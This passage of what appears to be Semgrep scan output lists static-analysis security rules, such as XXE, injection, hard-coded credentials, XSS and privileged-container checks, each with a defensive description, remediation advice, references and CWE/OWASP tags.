[https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","id":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","name":"kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"help":{"markdown":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createspan?view=net-6.0)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.memorymarshal.createreadonlyspan?view=net-6.0)\n","text":"MemoryMarshal.CreateSpan and MemoryMarshal.CreateReadOnlySpan should be used with caution, as the length argument is not checked."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","id":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","name":"csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.memory.memory-marshal-create-span.memory-marshal-create-span"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","id":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","name":"rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-connection-empty-password.hardcoded-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"help":{"markdown":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n - [https://www.youtube.com/watch?v=yYTkLUEdIyE](https://www.youtube.com/watch?v=yYTkLUEdIyE)\n - [https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough](https://www.veracode.com/blog/secure-development/nodejs-template-engines-why-default-encoders-are-not-enough)\n","text":"Detected a template variable used in a script tag. Although template variables are HTML escaped, HTML escaping does not always prevent cross-site scripting (XSS) attacks when used directly in JavaScript. If you need to do this, use `escape_javascript` or its alias, `j`. However, this will not protect from XSS in all circumstances; see the references for more information. Consider placing this value in the HTML portion (outside of a script tag)."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","id":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","name":"ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-script-tag.var-in-script-tag"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy)\n - [https://docs.cherrypy.dev/en/latest/tutorials.html](https://docs.cherrypy.dev/en/latest/tutorials.html)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","id":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","name":"python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.cherrypy.os.tainted-os-command-stdlib-cherrypy.tainted-os-command-stdlib-cherrypy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"help":{"markdown":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled)\n - [https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance](https://cheatsheetseries.owasp.org/cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance)\n - [https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx](https://msdn.microsoft.com/en-us/library/e8z01xdh.aspx)\n","text":"OWASP guidance recommends disabling tracing for production applications to prevent accidental leakage of sensitive application information."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","id":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","name":"csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled","properties":{"precision":"very-high","tags":["CWE-1323: Improper Management of Sensitive Trace Data","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.net-webconfig-trace-enabled.net-webconfig-trace-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Heroku API Key detected"},"help":{"markdown":"Heroku API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Heroku API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","id":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","name":"generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-heroku-api-key.detected-heroku-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","id":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","name":"kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.drivermanager-hardcoded-empty-secret.drivermanager-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"help":{"markdown":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected user input flowing into an HTML response. You may be accidentally bypassing secure methods of rendering HTML by manually constructing HTML and this could create a cross-site scripting vulnerability, which could let attackers steal sensitive user data."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.tainted-html-response.tainted-html-response","id":"python.aws-lambda.security.tainted-html-response.tainted-html-response","name":"python.aws-lambda.security.tainted-html-response.tainted-html-response","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.tainted-html-response.tainted-html-response"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","id":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","name":"kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.mongo.mongo-hardcoded-secret.mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"help":{"markdown":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples](https://docs.microsoft.com/en-us/dotnet/standard/base-types/regular-expressions#regular-expression-examples)\n","text":"When using `System.Text.RegularExpressions` to process untrusted input, pass a timeout. A malicious user can provide input to `RegularExpressions` that abuses the backtracking behaviour of this regular expression engine. This will lead to excessive CPU usage, causing a Denial-of-Service attack"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","id":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","name":"csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.regular-expression-dos.regular-expression-dos.regular-expression-dos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm2-express.vm2-express","id":"javascript.express.code.vm2-express.vm2-express","name":"javascript.express.code.vm2-express.vm2-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm2-express.vm2-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"help":{"markdown":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt)\n - [https://cryptography.io/en/latest/random-numbers/#random-number-generation](https://cryptography.io/en/latest/random-numbers/#random-number-generation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Hardcoded salt is used in cryptographic operations, which can result in major security issues. Use salt generator that is provided by bcrypt - `bcrypt.gensalt()`."},"helpUri":"https://semgrep.dev/r/python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","id":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","name":"python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.bcrypt.bcrypt-hardcoded-salt.bcrypt-hardcoded-salt"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"help":{"markdown":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service)\n - [https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html](https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html)\n - [https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/](https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/)\n","text":"Service '$SERVICE' is running in privileged mode. This grants the container the equivalent of root capabilities on the host machine. This can lead to container escapes, privilege escalation, and other security concerns. Remove the 'privileged' key to disable this capability."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.privileged-service.privileged-service","id":"yaml.docker-compose.security.privileged-service.privileged-service","name":"yaml.docker-compose.security.privileged-service.privileged-service","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.privileged-service.privileged-service"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","id":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","name":"kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.sql.jetbrains-hardcoded-empty-secret.jetbrains-hardcoded-empty-secret"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure the `SameSite` attribute of the important cookies (e.g., session cookie) is set to a reasonable value. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement."},"helpUri":"https://semgrep.dev/r/python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","id":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","name":"python.django.web.django-cookie-samesite-none.django-cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.web.django-cookie-samesite-none.django-cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"help":{"markdown":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n - [https://en.wikipedia.org/wiki/Mass_assignment_vulnerability](https://en.wikipedia.org/wiki/Mass_assignment_vulnerability)\n","text":"Depending on the context, user control data in `Object.assign` can cause web response to include data that it should not have or can lead to a mass assignment vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.insecure-object-assign.insecure-object-assign","id":"javascript.lang.security.insecure-object-assign.insecure-object-assign","name":"javascript.lang.security.insecure-object-assign.insecure-object-assign","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.insecure-object-assign.insecure-object-assign"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as 